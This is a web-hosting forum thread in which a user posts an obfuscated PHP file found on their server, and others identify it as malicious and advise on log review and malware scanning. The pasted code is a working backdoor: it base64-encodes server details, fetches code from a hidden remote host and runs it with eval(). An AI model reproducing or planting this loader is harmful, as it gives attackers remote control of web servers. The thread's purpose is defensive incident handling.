Please whitelist cPanel in your adblocker so that you’re able to see our version release promotions, thanks!

The Community Forums

Interact with an entire community of cPanel & WHM users!

What does this commands?

Discussion in 'Security' started by hostmasti, Nov 2, 2011.

  1. hostmasti

    hostmasti Registered

    Joined:
    Feb 24, 2009
    Messages:
    4
    Likes Received:
    0
    Trophy Points:
    51
    Please let us know what exactly this commands execute for? as we have found this unknown file uploaded in server.

    Code:
    <? error_reporting(0);$a=(isset($_SERVER["HTTP_HOST"])?$_SERVER["HTTP_HOST"]:$HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"])?$_SERVER["SERVER_NAME"]:$SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"])?$_SERVER["REQUEST_URI"]:$REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"])?$_SERVER["PHP_SELF"]:$PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"])?$_SERVER["QUERY_STRING"]:$QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"])?$_SERVER["HTTP_REFERER"]:$HTTP_REFERER);$g=(isset($_SERVER["HTTP_USER_AGENT"])?$_SERVER["HTTP_USER_AGENT"]:$HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"])?$_SERVER["REMOTE_ADDR"]:$REMOTE_ADDR);$i=(isset($_SERVER["SCRIPT_FILENAME"])?$_SERVER["SCRIPT_FILENAME"]:$SCRIPT_FILENAME);$j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"])?$_SERVER["HTTP_ACCEPT_LANGUAGE"]:$HTTP_ACCEPT_LANGUAGE);$z="/?".base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".e.".base64_encode($i).".".base64_encode($j);$f=base64_decode("cGhwZmVlZC5ydQ==");if (basename($c)==basename($i)&&isset($_REQUEST["q"])&&md5($_REQUEST["q"])=="20742f95bc39e28618c5dbedc1aaf0e6") $f=$_REQUEST["id"];if($c=file_get_contents(base64_decode("aHR0cDovLzdhZHMu").$f.$z))eval($c);else if($c=file_get_contents(base64_decode("aHR0cDovLzcu").$f.$z))eval($c);else{$cu=curl_init(base64_decode("aHR0cDovLzcxLg==").$f.$z);curl_setopt($cu,CURLOPT_RETURNTRANSFER,1);$o=curl_exec($cu);curl_close($cu);eval($o);};die(); ?>
     
  2. morissette

    morissette Well-Known Member

    Joined:
    May 24, 2009
    Messages:
    119
    Likes Received:
    0
    Trophy Points:
    66
    Location:
    Austin, TX
    cPanel Access Level:
    Root Administrator
    That is malicious and used to upload files via POST requests. Please contact your host's security/abuse department for investigation.

    OR

    Follow these steps:

    1. stat the file: `stat /home/user/public_html/somefile.php`
    2. save time stamp
    3. based off mtime and ctime review domlogs, messages and cpanel logs

    The above will typically tell you how the file was introduced to the account
     
    Stop hovering to collapse... Click to collapse... Hover to expand... Click to expand...
  3. storminternet

    storminternet Well-Known Member

    Joined:
    Nov 2, 2011
    Messages:
    460
    Likes Received:
    0
    Trophy Points:
    66
    cPanel Access Level:
    Root Administrator
    Hello,

    You can further scan the offended account with clamscan or maldet if you are having root privileges or you can also
    ask your host to do so.
     
    Stop hovering to collapse... Click to collapse... Hover to expand... Click to expand...
  4. hostmasti

    hostmasti Registered

    Joined:
    Feb 24, 2009
    Messages:
    4
    Likes Received:
    0
    Trophy Points:
    51
    I have manually deleted the file but now how can i go through the above steps?
     
  5. cPanelTristan

    cPanelTristan Quality Assurance Analyst
    Staff Member

    Joined:
    Oct 2, 2010
    Messages:
    7,608
    Likes Received:
    32
    Trophy Points:
    238
    Location:
    somewhere over the rainbow
    cPanel Access Level:
    Root Administrator
    You cannot do those steps when you've removed the file. In the future, you should try to obtain as much information about the file for reviewing logs and processes before removing the file.
     
    Stop hovering to collapse... Click to collapse... Hover to expand... Click to expand...
Loading...

Share This Page

  1. This site uses cookies to help personalise content, tailor your experience and to keep you logged in if you register.
    By continuing to use this site, you are consenting to our use of cookies.
    Dismiss Notice